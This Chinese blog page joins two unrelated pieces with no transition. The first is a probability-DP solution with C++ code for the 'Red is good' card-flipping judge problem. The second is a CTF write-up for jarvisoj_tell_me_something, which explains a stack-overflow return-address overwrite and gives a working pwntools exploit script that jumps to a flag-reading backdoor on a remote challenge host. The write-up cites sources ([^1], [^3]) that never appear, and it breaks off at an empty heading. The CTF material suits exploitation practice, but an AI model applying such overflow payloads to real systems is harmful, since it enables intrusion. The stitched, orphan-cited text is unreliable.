oj_470 Red is good

本文介绍了一个关于翻牌游戏的博弈论问题,玩家面对桌面随机排列的红牌和黑牌,通过数学期望的方法求解最优策略下的平均收益,并提供了一段使用C++实现的代码。

题目描述

Problem 470: Red is good
Time Limit: 1000 ms
Memory Limit: 524288 KB

Problem Description

桌面上有R张红牌和B张黑牌,随机打乱顺序后放在桌面上,开始一张一张地翻牌,翻到红牌得到1美元,黑牌则付出1美元。可以随时停止翻牌,在最优策略下平均能得到多少钱。 输出答案时,小数点后第六位后的全部去掉,不要四舍五入.

Input

一行输入两个数R,B,其值在0到5000之间

Output

在最优策略下平均能得到多少钱。

Sample Input

5 1

Sample Output

4.166666

题解

概率期望

和的期望==期望的和
输出答案时,小数点后第六位后的全部去掉,不要四舍五入.
可以用滚动数组

所以
f【i】【j】表示剩余i个red,j个black的期望值
滚动后f【j】表示剩余j个black的期望值
因为期望值为负时,还不如break
所以f[j]=max(f[j],(double)0);
最后要注意精度问题
f【m】=f【m】-0.0000005

代码

#include<cstdio>
#include<iostream>
#include<cmath>
#define N 5010
using namespace std;
double f[N];
int n,m;
int main(){
    scanf("%d%d",&n,&m);
    for(int i=0;i<=n;i++){
        for(int j=0;j<=m;j++){
            if(i>0)f[j]=((double)i/(double)(i+j))*(f[j]+1); //转移
            if(j>0)f[j]+=((double)j/(double)(i+j))*(f[j-1]-1);
            f[j]=max(f[j],(double)0);
        }
    }
    printf("%.6f\n",f[m]-0.0000005);
}
### 漏洞分析与利用方式 在 `jarvisoj_tell_me_something` 这道题目中,程序是一个 64 位的可执行文件,并且开启了 NX(No-eXecute)保护,这意味着栈上数据不能直接执行,攻击者无法直接注入 shellcode 到栈上执行。然而,程序中存在一个明显的栈溢出漏洞,这使得攻击者可以通过覆盖返回地址来控制程序执行流程[^1]。 程序的主要漏洞位于 `main` 函数中,变量 `v4` 是一个 64 位的局部变量,位于栈上。通过 `read` 函数向该变量读取了 0x100(256)字节的数据,而 `v4` 本身的大小仅为 8 字节。因此,这种不匹配会导致栈上的返回地址被覆盖,从而实现控制流劫持[^3]。 ### 利用方式 题目中存在一个后门函数 `good_game()`,该函数会尝试打开 `flag.txt` 文件,这意味着如果能够将程序的执行流跳转到该函数地址,就可以读取到 flag 文件内容[^1]。 在利用过程中,构造的 payload 由两部分组成: 1. **填充部分**:使用 `'A'` 或其他字符填充至 0x88 字节,以覆盖栈上的局部变量和保存的寄存器。 2. **地址覆盖部分**:将 `good_game()` 函数的地址以小端序格式写入栈上,覆盖返回地址。 最终的 payload 结构如下: ```python payload = b'A' * 0x88 + p64(good_game_addr) ``` ### EXP 示例 以下是一个典型的利用脚本示例,使用 `pwntools` 库进行远程连接和 payload 发送: ```python from pwn import * # 连接到远程服务器 r = remote("node4.buuoj.cn", 28428) # 获取 good_game 函数的地址 good_game_addr = 0x400620 # 构造 payload payload = b'A' * 0x88 + p64(good_game_addr) # 发送 payload r.sendline(payload) # 进入交互模式,查看 flag r.interactive() ``` ### 注意事项 1. **IDA 分析的准确性**:虽然 IDA 可以帮助快速定位溢出点和函数地址,但在某些情况下,IDA 的分析可能会与实际运行环境存在差异。例如,`main` 函数中没有 `push rbp` 操作,因此不需要额外填充 8 字节来覆盖保存的 `rbp` 值[^4]。 2. **远程连接问题**:不同题目实例的端口号可能不同,确保使用正确的 IP 和端口进行连接。 3. **环境一致性**:在本地测试时,可以使用 `process` 函数启动本地进程,但在提交时应切换为 `remote` 连接。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值